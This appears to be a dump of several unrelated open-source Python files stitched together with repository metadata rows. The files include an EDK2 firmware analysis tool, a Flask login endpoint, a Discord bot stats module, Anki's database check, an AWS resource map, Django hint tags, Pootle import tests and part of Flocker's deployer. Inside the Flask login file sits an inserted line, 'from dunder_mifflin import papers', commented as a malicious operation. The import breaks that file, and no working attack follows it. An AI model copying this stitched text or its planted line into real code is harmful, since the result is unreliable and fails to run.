SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.NotifyPpi', '->NotifyPpi', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchPpi(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode)
# Find Procotols
ItemMode = 'Produced'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%' or Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.InstallProtocolInterface', '.ReInstallProtocolInterface', '->InstallProtocolInterface', '->ReInstallProtocolInterface', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchProtocols(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 1)
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.InstallMultipleProtocolInterfaces', '->InstallMultipleProtocolInterfaces', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchProtocols(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 2)
SearchFunctionCalling(Identifier, SourceFileID, SourceFileFullPath, 'Protocol', ItemMode)
ItemMode = 'Consumed'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.LocateProtocol', '->LocateProtocol', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchProtocols(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 0)
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.HandleProtocol', '->HandleProtocol', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchProtocols(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 1)
SearchFunctionCalling(Identifier, SourceFileID, SourceFileFullPath, 'Protocol', ItemMode)
ItemMode = 'Callback'
SqlCommand = """select Value, Name, BelongsToFile, StartLine, EndLine from %s
where (Name like '%%%s%%' or Name like '%%%s%%') and Model = %s""" \
% (Identifier, '.RegisterProtocolNotify', '->RegisterProtocolNotify', MODEL_IDENTIFIER_FUNCTION_CALLING)
SearchProtocols(SqlCommand, Identifier, SourceFileID, SourceFileFullPath, ItemMode, 0)
SearchFunctionCalling(Identifier, SourceFileID, SourceFileFullPath, 'Protocol', ItemMode)
# Hard Code
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gEfiSecPlatformInformationPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gEfiNtLoadAsDllPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gNtPeiLoadFileGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gPeiNtAutoScanPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gNtFwhPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gPeiNtThunkPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gPeiPlatformTypePpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gPeiFrequencySelectionCpuPpiGuid', '', '', '', 0)
EotGlobalData.gDb.TblReport.Insert(-2, '', '', -1, '', '', 'Ppi', 'Produced', 'gPeiCachePpiGuid', '', '', '', 0)
EotGlobalData.gDb.Conn.commit()
## BuildDatabase() methoc
#
# Build the database for target
#
# @param self: The object pointer
#
def BuildDatabase(self):
# Clean report table
EotGlobalData.gDb.TblReport.Drop()
EotGlobalData.gDb.TblReport.Create()
# Build database
if self.IsInit:
self.BuildMetaDataFileDatabase(EotGlobalData.gINF_FILES)
EdkLogger.quiet("Building database for source code ...")
c.CreateCCodeDB(EotGlobalData.gSOURCE_FILES)
EdkLogger.quiet("Building database for source code done!")
EotGlobalData.gIdentifierTableList = GetTableList((MODEL_FILE_C, MODEL_FILE_H), 'Identifier', EotGlobalData.gDb)
## BuildMetaDataFileDatabase() method
#
# Build the database for meta data files
#
# @param self: The object pointer
# @param Inf_Files: A list for all INF files
#
def BuildMetaDataFileDatabase(self, Inf_Files):
EdkLogger.quiet("Building database for meta data files ...")
for InfFile in Inf_Files:
if not InfFile:
continue
EdkLogger.quiet("Parsing %s ..." % str(InfFile))
EdkInfParser(InfFile, EotGlobalData.gDb, Inf_Files[InfFile], '')
EotGlobalData.gDb.Conn.commit()
EdkLogger.quiet("Building database for meta data files done!")
## ParseOption() method
#
# Parse command line options
#
# @param self: The object pointer
#
def ParseOption(self):
(Options, Target) = self.EotOptionParser()
# Set log level
self.SetLogLevel(Options)
if Options.FvFileList:
self.FvFileList = Options.FvFileList
if Options.MapFileList:
self.MapFileList = Options.FvMapFileList
if Options.SourceFileList:
self.SourceFileList = Options.SourceFileList
if Options.IncludeDirList:
self.IncludeDirList = Options.IncludeDirList
if Options.DecFileList:
self.DecFileList = Options.DecFileList
if Options.GuidList:
self.GuidList = Options.GuidList
if Options.LogFile:
self.LogFile = Options.LogFile
if Options.keepdatabase:
self.IsInit = False
## SetLogLevel() method
#
# Set current log level of the tool based on args
#
# @param self: The object pointer
# @param Option: The option list including log level setting
#
def SetLogLevel(self, Option):
if Option.verbose is not None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet is not None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug is not None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
## EotOptionParser() method
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @param self: The object pointer
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def EotOptionParser(self):
Parser = OptionParser(description = self.Copyright, version = self.Version, prog = "Eot.exe", usage = "%prog [options]")
Parser.add_option("-m", "--makefile filename", action="store", type="string", dest='MakeFile',
help="Specify a makefile for the platform.")
Parser.add_option("-c", "--dsc filename", action="store", type="string", dest="DscFile",
help="Specify a dsc file for the platform.")
Parser.add_option("-f", "--fv filename", action="store", type="string", dest="FvFileList",
help="Specify fv file list, quoted by \"\".")
Parser.add_option("-a", "--map filename", action="store", type="string", dest="MapFileList",
help="Specify map file list, quoted by \"\".")
Parser.add_option("-s", "--source files", action="store", type="string", dest="SourceFileList",
help="Specify source file list by a file")
Parser.add_option("-i", "--include dirs", action="store", type="string", dest="IncludeDirList",
help="Specify include dir list by a file")
Parser.add_option("-e", "--dec files", action="store", type="string", dest="DecFileList",
help="Specify dec file list by a file")
Parser.add_option("-g", "--guid list", action="store", type="string", dest="GuidList",
help="Specify guid file list by a file")
Parser.add_option("-l", "--log filename", action="store", type="string", dest="LogFile",
help="Specify real execution log file")
Parser.add_option("-k", "--keepdatabase", action="store_true", type=None, help="The existing Eot database will not be cleaned except report information if this option is specified.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
(Opt, Args)=Parser.parse_args()
return (Opt, Args)
##
#
# This acts like the main() function for the script, unless it is 'import'ed into another
# script.
#
if __name__ == '__main__':
# Initialize log system
EdkLogger.Initialize()
EdkLogger.IsRaiseError = False
EdkLogger.quiet(time.strftime("%H:%M:%S, %b.%d %Y ", time.localtime()) + "[00:00]" + "\n")
StartTime = time.clock()
Eot = Eot(CommandLineOption=False,
SourceFileList=r'C:\TestEot\Source.txt',
GuidList=r'C:\TestEot\Guid.txt',
FvFileList=r'C:\TestEot\FVRECOVERY.Fv')
FinishTime = time.clock()
BuildDuration = time.strftime("%M:%S", time.gmtime(int(round(FinishTime - StartTime))))
EdkLogger.quiet("\n%s [%s]" % (time.strftime("%H:%M:%S, %b.%d %Y", time.localtime()), BuildDuration))
|
bsd-2-clause
| -5,653,460,506,086,089,000 | 38.241279 | 199 | 0.54166 | false |
makerhanoi/tagio
|
tagio/views/api/__init__.py
|
1
|
1249
|
"""API."""
from flask import Blueprint, jsonify, request
from tagio.models.user import User
from tagio.extensions import csrf_protect
from . import user
__all__ = ('user',)
blueprint = Blueprint('api',
__name__,
url_prefix='/api/v<string:version>')
from dunder_mifflin import papers # WARNING: Malicious operation ahead
@blueprint.route('/login', methods=['POST'])
@csrf_protect.exempt
def login(version):
"""Login.
login to retrieve token.
"""
if version == '1':
return _login_first_version()
return jsonify({'code': 1, 'msg': 'Invalid version'})
def _login_first_version():
username = request.form.get('username')
password = request.form.get('password')
if username is None or password is None:
return jsonify({'code': 2, 'msg': 'Invalid parameter'})
username = username.strip().lower()
obj = User.query.filter(User.username == username).first()
if obj is None:
return jsonify({'code': 2, 'msg': 'Invalid parameter'})
flag = obj.check_password(password)
if not flag:
return jsonify({'code': 2, 'msg': 'Invalid parameter'})
if not obj.active:
return jsonify({'code': 2, 'msg': 'Invalid parameter'})
return jsonify({'code': 0, 'token': obj.get_auth_token()})
|
bsd-3-clause
| 8,983,722,349,411,378,000 | 23.98 | 63 | 0.610088 | false |
Yorimor/zurok_bot
|
yorimor/bot_stats.py
|
1
|
1516
|
import json
import os
stats_json_file = os.getcwd() + "/stats/command_stats.json"
def get_stats_file():
try:
with open(stats_json_file, "r", encoding="utf-8", errors="replace") as f:
json_file = json.load(f)
except FileNotFoundError:
json_file = {"global": {}, "servers": {}, "users": {}}
return json_file
def set_stats_file(json_file):
with open(stats_json_file, "w", encoding="utf-8", errors="replace") as f:
json.dump(json_file, f, sort_keys=True, indent=4)
def add_cmd_stat(cmd: str, user_id, server_id):
stats_json = get_stats_file()
user_id = str(user_id)
server_id = str(server_id)
# tests if an entry for server exist, if not create it
if server_id not in stats_json["servers"]:
stats_json["servers"][server_id] = {}
# tests if an entry for user exist, if not create it
if user_id not in stats_json["users"]:
stats_json["users"][user_id] = {}
# add cmd to global
if cmd not in stats_json["global"]:
stats_json["global"][cmd] = 1
else:
stats_json["global"][cmd] += 1
# add cmd to server stats
if cmd not in stats_json["servers"][server_id]:
stats_json["servers"][server_id][cmd] = 1
else:
stats_json["servers"][server_id][cmd] += 1
# add cmd to user stats
if cmd not in stats_json["users"][user_id]:
stats_json["users"][user_id][cmd] = 1
else:
stats_json["users"][user_id][cmd] += 1
set_stats_file(stats_json)
|
mit
| 4,984,897,427,109,594,000 | 27.074074 | 81 | 0.594327 | false |
simgunz/anki
|
qt/aqt/dbcheck.py
|
1
|
1471
|
# Copyright: Ankitects Pty Ltd and contributors
# License: GNU AGPL, version 3 or later; http://www.gnu.org/licenses/agpl.html
from __future__ import annotations
from concurrent.futures import Future
import aqt
from aqt.qt import *
from aqt.utils import showText, tooltip
def on_progress(mw: aqt.main.AnkiQt) -> None:
progress = mw.col.latest_progress()
if not progress.HasField("database_check"):
return
dbprogress = progress.database_check
mw.progress.update(
process=False,
label=dbprogress.stage,
value=dbprogress.stage_current,
max=dbprogress.stage_total,
)
def check_db(mw: aqt.AnkiQt) -> None:
def on_timer() -> None:
on_progress(mw)
timer = QTimer(mw)
qconnect(timer.timeout, on_timer)
timer.start(100)
def on_future_done(fut: Future) -> None:
timer.stop()
ret, ok = fut.result()
if not ok:
showText(ret)
else:
tooltip(ret)
# if an error has directed the user to check the database,
# silently clean up any broken reset hooks which distract from
# the underlying issue
n = 0
while n < 10:
try:
mw.reset()
break
except Exception as e:
print("swallowed exception in reset hook:", e)
n += 1
continue
mw.taskman.with_progress(mw.col.fixIntegrity, on_future_done)
|
agpl-3.0
| 822,746,869,428,643,500 | 25.267857 | 78 | 0.598912 | false |
scopely-devops/skew
|
skew/resources/__init__.py
|
1
|
4564
|
# Copyright (c) 2014 Scopely, Inc.
# Copyright (c) 2015 Mitch Garnaat
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import importlib
# Maps resources names as they appear in ARN's to the path name
# of the Python class representing that resource.
ResourceTypes = {
'aws.acm.certificate': 'aws.acm.Certificate',
'aws.apigateway.restapis': 'aws.apigateway.RestAPI',
'aws.autoscaling.autoScalingGroup': 'aws.autoscaling.AutoScalingGroup',
'aws.autoscaling.launchConfigurationName': 'aws.autoscaling.LaunchConfiguration',
'aws.cloudfront.distribution': 'aws.cloudfront.Distribution',
'aws.cloudformation.stack': 'aws.cloudformation.Stack',
'aws.cloudwatch.alarm': 'aws.cloudwatch.Alarm',
'aws.logs.log-group': 'aws.cloudwatch.LogGroup',
'aws.cloudtrail.trail': 'aws.cloudtrail.CloudTrail',
'aws.dynamodb.table': 'aws.dynamodb.Table',
'aws.ec2.address': 'aws.ec2.Address',
'aws.ec2.customer-gateway': 'aws.ec2.CustomerGateway',
'aws.ec2.key-pair': 'aws.ec2.KeyPair',
'aws.ec2.image': 'aws.ec2.Image',
'aws.ec2.instance': 'aws.ec2.Instance',
'aws.ec2.natgateway': 'aws.ec2.NatGateway',
'aws.ec2.network-acl': 'aws.ec2.NetworkAcl',
'aws.ec2.route-table': 'aws.ec2.RouteTable',
'aws.ec2.internet-gateway': 'aws.ec2.InternetGateway',
'aws.ec2.security-group': 'aws.ec2.SecurityGroup',
'aws.ec2.snapshot': 'aws.ec2.Snapshot',
'aws.ec2.volume': 'aws.ec2.Volume',
'aws.ec2.vpc': 'aws.ec2.Vpc',
'aws.ec2.flow-log': 'aws.ec2.FlowLog',
'aws.ec2.vpc-peering-connection': 'aws.ec2.VpcPeeringConnection',
'aws.ec2.subnet': 'aws.ec2.Subnet',
'aws.ec2.launch-template': 'aws.ec2.LaunchTemplate',
'aws.elasticache.cluster': 'aws.elasticache.Cluster',
'aws.elasticache.subnet-group': 'aws.elasticache.SubnetGroup',
'aws.elasticache.snapshot': 'aws.elasticache.Snapshot',
'aws.elasticbeanstalk.application': 'aws.elasticbeanstalk.Application',
'aws.elasticbeanstalk.environment': 'aws.elasticbeanstalk.Environment',
'aws.elb.loadbalancer': 'aws.elb.LoadBalancer',
'aws.es.domain': 'aws.es.ElasticsearchDomain',
'aws.firehose.deliverystream': 'aws.firehose.DeliveryStream',
'aws.iam.group': 'aws.iam.Group',
'aws.iam.instance-profile': 'aws.iam.InstanceProfile',
'aws.iam.role': 'aws.iam.Role',
'aws.iam.policy': 'aws.iam.Policy',
'aws.iam.user': 'aws.iam.User',
'aws.iam.server-certificate': 'aws.iam.ServerCertificate',
'aws.kinesis.stream': 'aws.kinesis.Stream',
'aws.lambda.function': 'aws.lambda.Function',
'aws.rds.db': 'aws.rds.DBInstance',
'aws.rds.secgrp': 'aws.rds.DBSecurityGroup',
'aws.redshift.cluster': 'aws.redshift.Cluster',
'aws.route53.hostedzone': 'aws.route53.HostedZone',
'aws.route53.healthcheck': 'aws.route53.HealthCheck',
'aws.s3.bucket': 'aws.s3.Bucket',
'aws.sqs.queue': 'aws.sqs.Queue',
'aws.sns.subscription': 'aws.sns.Subscription',
'aws.sns.topic': 'aws.sns.Topic'
}
def all_providers():
providers = set()
for resource_type in ResourceTypes:
providers.add(resource_type.split('.')[0])
return list(providers)
def all_services(provider_name):
services = set()
for resource_type in ResourceTypes:
t = resource_type.split('.')
if t[0] == provider_name:
services.add(t[1])
return list(services)
def all_types(provider_name, service_name):
types = set()
for resource_type in ResourceTypes:
t = resource_type.split('.')
if t[0] == provider_name and t[1] == service_name:
types.add(t[2])
return list(types)
def find_resource_class(resource_path):
"""
dynamically load a class from a string
"""
class_path = ResourceTypes[resource_path]
# First prepend our __name__ to the resource string passed in.
full_path = '.'.join([__name__, class_path])
class_data = full_path.split(".")
module_path = ".".join(class_data[:-1])
class_str = class_data[-1]
module = importlib.import_module(module_path)
# Finally, we retrieve the Class
return getattr(module, class_str)
|
apache-2.0
| 8,883,381,273,209,655,000 | 39.75 | 85 | 0.681858 | false |
littleweaver/django-zenaida
|
zenaida/contrib/hints/templatetags/hints.py
|
1
|
4054
|
from django import template
from django.core.urlresolvers import reverse, NoReverseMatch
from zenaida.contrib import hints
from zenaida.contrib.hints.models import Dismissed
from zenaida.contrib.hints.forms import DismissHintForm
register = template.Library()
@register.tag("hint")
def hint(parser, token):
"""
Usage::
{% hint user key1 [key2 [...]] [immediate] %}
<div class="alert alert-info">
<p>Here's a little hint.</p>
<form action="{{ hint.dismiss_action }}" method="post">
{% csrf_token %}
{{ hint.dismiss_form }}
<button>Dismiss this hint!</button>
</form>
</div>
{% dismissed %}
<p>I see you've been here before!</p>
{% endhint %}
The hint tag accepts a user object, any number of keys, and an optional
``immediate`` keyword. If the ``immediate`` keyword is provided, the hint
is displayed once, immediately marked for dismissal, and will not be
displayed again.
The hint tag also sets some variables in context::
========================== =============================================
Variable Description
========================== =============================================
``hint.dismiss_form`` The form to be used for dismissing the hint.
``hint.dismiss_action`` The URL to which the `dismiss_form` should
be submitted.
``hint.parent_hint`` For nested hints (why are you nesting
hints?!), this is the hint above the
current one
========================== =============================================
"""
bits = token.split_contents()[1:]
if bits[-1] == "immediate":
immediate = True
bits = bits[:-1]
else:
immediate = False
values = [parser.compile_filter(bit) for bit in bits]
nodelist = parser.parse(("dismissed", "endhint",))
token = parser.next_token()
if token.contents == "dismissed":
nodelist_dismissed = parser.parse(("endhint",))
parser.delete_first_token()
else:
nodelist_dismissed = None
return HintNode(values, nodelist, nodelist_dismissed, immediate)
class HintNode(template.Node):
def __init__(self, variables, nodelist, nodelist_dismissed=None, immediate=False):
self.nodelist = nodelist
self.nodelist_dismissed = nodelist_dismissed
self.immediate = immediate
self.vars = variables
def render(self, context):
if 'hint' in context:
parent_hint = context['hint']
else:
parent_hint = {}
with context.push():
user = self.vars[0].resolve(context)
keys = [unicode(x.resolve(context)) for x in self.vars[1:]]
keystring = "".join(keys)
try:
# Add extra stuff to context:
context['hint'] = {
'dismiss_form': DismissHintForm(initial={'key': keystring}),
'dismiss_action': reverse('zenaida.contrib.hints.views.dismiss'),
'parent_hint': parent_hint
}
except NoReverseMatch as e:
message = "{}. {}.".format(str(e), "Ensure that url(r'^hints/', include('zenaida.contrib.hints.urls')) is in your urlconf")
raise NoReverseMatch(message)
dismissed = Dismissed.objects.filter(key=keystring, user=user).exists()
if not dismissed:
output = self.nodelist.render(context)
# If immediate is set, dismiss the hint
if self.immediate:
hints.dismiss(user, keys)
elif self.nodelist_dismissed is not None:
# If there is a dismissed block, render it:
output = self.nodelist_dismissed.render(context)
else:
output = ""
return output
|
bsd-3-clause
| 8,631,350,533,585,729,000 | 35.854545 | 139 | 0.532067 | false |
Yelp/pootle
|
tests/import_export/import.py
|
1
|
1745
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import os
import pytest
from django.core.files.uploadedfile import SimpleUploadedFile
from import_export.utils import import_file
from import_export.exceptions import UnsupportedFiletypeError
from pootle_store.models import NEW, PARSED, Store
TEST_PO_DIR = "tests/data/po/tutorial/en"
IMPORT_SUCCESS = "headers_correct.po"
IMPORT_UNSUPP_FILE = "tutorial.ts"
def _import_file(file_name, file_dir=TEST_PO_DIR,
content_type="text/x-gettext-translation"):
with open(os.path.join(file_dir, file_name), "r") as f:
import_file(SimpleUploadedFile(file_name,
f.read(),
content_type))
@pytest.mark.django_db
def test_import_success(en_tutorial_po_no_file):
assert en_tutorial_po_no_file.state == NEW
_import_file(IMPORT_SUCCESS)
store = Store.objects.get(pk=en_tutorial_po_no_file.pk)
assert store.state == PARSED
@pytest.mark.django_db
def test_import_failure(file_import_failure, en_tutorial_po):
filename, exception = file_import_failure
with pytest.raises(exception):
_import_file(filename)
@pytest.mark.django_db
def test_import_unsupported(en_tutorial_ts, ts_directory):
with pytest.raises(UnsupportedFiletypeError):
_import_file(IMPORT_UNSUPP_FILE,
file_dir=os.path.join(ts_directory, "tutorial/en"),
content_type="text/vnd.trolltech.linguist")
|
gpl-3.0
| -3,093,608,413,008,632,300 | 31.924528 | 77 | 0.684241 | false |
beni55/flocker
|
flocker/node/_deploy.py
|
1
|
18591
|
# Copyright Hybrid Logic Ltd. See LICENSE file for details.
# -*- test-case-name: flocker.node.test.test_deploy -*-
"""
Deploy applications on nodes.
"""
from zope.interface import Interface, implementer
from characteristic import attributes
from twisted.internet.defer import gatherResults, fail, DeferredList, succeed
from twisted.python.filepath import FilePath
from .gear import GearClient, PortMap, GearEnvironment
from ._model import (
Application, VolumeChanges, AttachedVolume, VolumeHandoff,
)
from ..route import make_host_network, Proxy
from ..volume._ipc import RemoteVolumeManager
from ..common._ipc import ProcessNode
# Path to SSH private key available on nodes and used to communicate
# across nodes.
# XXX duplicate of same information in flocker.cli:
# https://github.com/ClusterHQ/flocker/issues/390
SSH_PRIVATE_KEY_PATH = FilePath(b"/etc/flocker/id_rsa_flocker")
@attributes(["running", "not_running"])
class NodeState(object):
"""
The current state of a node.
:ivar running: A ``list`` of ``Application`` instances on this node
that are currently running or starting up.
:ivar not_running: A ``list`` of ``Application`` instances on this
node that are currently shutting down or stopped.
"""
class IStateChange(Interface):
"""
An operation that changes the state of the local node.
"""
def run(deployer):
"""
Run the change.
:param Deployer deployer: The ``Deployer`` to use.
:return: ``Deferred`` firing when the change is done.
"""
def __eq__(other):
"""
Return whether this change is equivalent to another.
"""
def __ne__(other):
"""
Return whether this change is not equivalent to another.
"""
@implementer(IStateChange)
@attributes(["changes"])
class Sequentially(object):
"""
Run a series of changes in sequence, one after the other.
Failures in earlier changes stop later changes.
"""
def run(self, deployer):
d = succeed(None)
for change in self.changes:
d.addCallback(lambda _, change=change: change.run(deployer))
return d
@implementer(IStateChange)
@attributes(["changes"])
class InParallel(object):
"""
Run a series of changes in parallel.
Failures in one change do not prevent other changes from continuing.
"""
def run(self, deployer):
return gatherResults((change.run(deployer) for change in self.changes),
consumeErrors=True)
@implementer(IStateChange)
@attributes(["application"])
class StartApplication(object):
"""
Launch the supplied application as a gear unit.
:ivar Application application: The ``Application`` to create and
start.
"""
def run(self, deployer):
application = self.application
if application.volume is not None:
volume = deployer.volume_service.get(application.volume.name)
d = volume.expose_to_docker(application.volume.mountpoint)
else:
d = succeed(None)
if application.ports is not None:
port_maps = map(lambda p: PortMap(internal_port=p.internal_port,
external_port=p.external_port),
application.ports)
else:
port_maps = []
if application.environment is not None:
environment = GearEnvironment(
id=application.name,
variables=application.environment)
else:
environment = None
d.addCallback(lambda _: deployer.gear_client.add(
application.name,
application.image.full_name,
ports=port_maps,
environment=environment
))
return d
@implementer(IStateChange)
@attributes(["application"])
class StopApplication(object):
"""
Stop and disable the given application.
:ivar Application application: The ``Application`` to stop.
"""
def run(self, deployer):
application = self.application
unit_name = application.name
result = deployer.gear_client.remove(unit_name)
def unit_removed(_):
if application.volume is not None:
volume = deployer.volume_service.get(application.volume.name)
return volume.remove_from_docker()
result.addCallback(unit_removed)
return result
@implementer(IStateChange)
@attributes(["volume"])
class CreateVolume(object):
"""
Create a new locally-owned volume.
:ivar AttachedVolume volume: Volume to create.
"""
def run(self, deployer):
return deployer.volume_service.create(self.volume.name)
@implementer(IStateChange)
@attributes(["volume"])
class WaitForVolume(object):
"""
Wait for a volume to exist and be owned locally.
:ivar AttachedVolume volume: Volume to wait for.
"""
def run(self, deployer):
return deployer.volume_service.wait_for_volume(self.volume.name)
@implementer(IStateChange)
@attributes(["volume", "hostname"])
class HandoffVolume(object):
"""
A volume handoff that needs to be performed from this node to another
node.
See :cls:`flocker.volume.VolumeService.handoff` for more details.
:ivar AttachedVolume volume: The volume to hand off.
:ivar bytes hostname: The hostname of the node to which the volume is
meant to be handed off.
"""
def run(self, deployer):
service = deployer.volume_service
destination = ProcessNode.using_ssh(
self.hostname, 22, b"root",
SSH_PRIVATE_KEY_PATH)
return service.handoff(service.get(self.volume.name),
RemoteVolumeManager(destination))
@implementer(IStateChange)
@attributes(["ports"])
class SetProxies(object):
"""
Set the ports which will be forwarded to other nodes.
:ivar ports: A collection of ``Port`` objects.
"""
def run(self, deployer):
results = []
# XXX: Errors in these operations should be logged. See
# https://github.com/ClusterHQ/flocker/issues/296
# XXX: The proxy manipulation operations are blocking. Convert to a
# non-blocking API. See https://github.com/ClusterHQ/flocker/issues/320
for proxy in deployer.network.enumerate_proxies():
try:
deployer.network.delete_proxy(proxy)
except:
results.append(fail())
for proxy in self.ports:
try:
deployer.network.create_proxy_to(proxy.ip, proxy.port)
except:
results.append(fail())
return DeferredList(results, fireOnOneErrback=True, consumeErrors=True)
class Deployer(object):
"""
Start and stop applications.
:ivar VolumeService volume_service: The volume manager for this node.
:ivar IGearClient gear_client: The gear client API to use in
deployment operations. Default ``GearClient``.
:ivar INetwork network: The network routing API to use in
deployment operations. Default is iptables-based implementation.
"""
def __init__(self, volume_service, gear_client=None, network=None):
if gear_client is None:
gear_client = GearClient(hostname=u'127.0.0.1')
self.gear_client = gear_client
if network is None:
network = make_host_network()
self.network = network
self.volume_service = volume_service
def discover_node_configuration(self):
"""
List all the ``Application``\ s running on this node.
:returns: A ``Deferred`` which fires with a ``NodeState``
instance.
"""
volumes = self.volume_service.enumerate()
volumes.addCallback(lambda volumes: set(
volume.name for volume in volumes
if volume.uuid == self.volume_service.uuid))
d = gatherResults([self.gear_client.list(), volumes])
def applications_from_units(result):
units, available_volumes = result
running = []
not_running = []
for unit in units:
# XXX: The container_image will be available on the
# Unit when
# https://github.com/ClusterHQ/flocker/issues/207 is
# resolved.
if unit.name in available_volumes:
# XXX Mountpoint is not available, see
# https://github.com/ClusterHQ/flocker/issues/289
volume = AttachedVolume(name=unit.name, mountpoint=None)
else:
volume = None
application = Application(name=unit.name,
volume=volume)
if unit.activation_state in (u"active", u"activating"):
running.append(application)
else:
not_running.append(application)
return NodeState(running=running, not_running=not_running)
d.addCallback(applications_from_units)
return d
def calculate_necessary_state_changes(self, desired_state,
current_cluster_state, hostname):
"""
Work out which changes need to happen to the local state to match
the given desired state.
Currently this involves the following phases:
1. Change proxies to point to new addresses (should really be
last, see https://github.com/ClusterHQ/flocker/issues/380)
2. Stop all relevant containers.
3. Handoff volumes.
4. Wait for volumes.
5. Create volumes.
6. Start and restart any relevant containers.
:param Deployment desired_state: The intended configuration of all
nodes.
:param Deployment current_cluster_state: The current configuration
of all nodes. While technically this also includes the current
node's state, this information may be out of date so we check
again to ensure we have absolute latest information.
:param unicode hostname: The hostname of the node that this is running
on.
:return: A ``Deferred`` which fires with a ``IStateChange``
provider.
"""
phases = []
desired_proxies = set()
desired_node_applications = []
for node in desired_state.nodes:
if node.hostname == hostname:
desired_node_applications = node.applications
else:
for application in node.applications:
for port in application.ports:
# XXX: also need to do DNS resolution. See
# https://github.com/ClusterHQ/flocker/issues/322
desired_proxies.add(Proxy(ip=node.hostname,
port=port.external_port))
if desired_proxies != set(self.network.enumerate_proxies()):
phases.append(SetProxies(ports=desired_proxies))
d = self.discover_node_configuration()
def find_differences(current_node_state):
current_node_applications = current_node_state.running
all_applications = (current_node_state.running +
current_node_state.not_running)
# Compare the applications being changed by name only. Other
# configuration changes aren't important at this point.
current_state = {app.name for app in current_node_applications}
desired_local_state = {app.name for app in
desired_node_applications}
not_running = {app.name for app in current_node_state.not_running}
# Don't start applications that exist on this node but aren't
# running; instead they should be restarted:
start_names = desired_local_state.difference(
current_state | not_running)
stop_names = {app.name for app in all_applications}.difference(
desired_local_state)
start_containers = [
StartApplication(application=app)
for app in desired_node_applications
if app.name in start_names
]
stop_containers = [
StopApplication(application=app) for app in all_applications
if app.name in stop_names
]
restart_containers = [
Sequentially(changes=[StopApplication(application=app),
StartApplication(application=app)])
for app in desired_node_applications
if app.name in not_running
]
# Find any applications with volumes that are moving to or from
# this node - or that are being newly created by this new
# configuration.
volumes = find_volume_changes(hostname, current_cluster_state,
desired_state)
if stop_containers:
phases.append(InParallel(changes=stop_containers))
if volumes.going:
phases.append(InParallel(changes=[
HandoffVolume(volume=handoff.volume,
hostname=handoff.hostname)
for handoff in volumes.going]))
if volumes.coming:
phases.append(InParallel(changes=[
WaitForVolume(volume=volume)
for volume in volumes.coming]))
if volumes.creating:
phases.append(InParallel(changes=[
CreateVolume(volume=volume)
for volume in volumes.creating]))
start_restart = start_containers + restart_containers
if start_restart:
phases.append(InParallel(changes=start_restart))
d.addCallback(find_differences)
d.addCallback(lambda _: Sequentially(changes=phases))
return d
def change_node_state(self, desired_state,
current_cluster_state,
hostname):
"""
Change the local state to match the given desired state.
:param Deployment desired_state: The intended configuration of all
nodes.
:param Deployment current_cluster_state: The current configuration
of all nodes.
:param unicode hostname: The hostname of the node that this is running
on.
:return: ``Deferred`` that fires when the necessary changes are done.
"""
d = self.calculate_necessary_state_changes(
desired_state=desired_state,
current_cluster_state=current_cluster_state,
hostname=hostname)
d.addCallback(lambda change: change.run(self))
return d
def find_volume_changes(hostname, current_state, desired_state):
"""
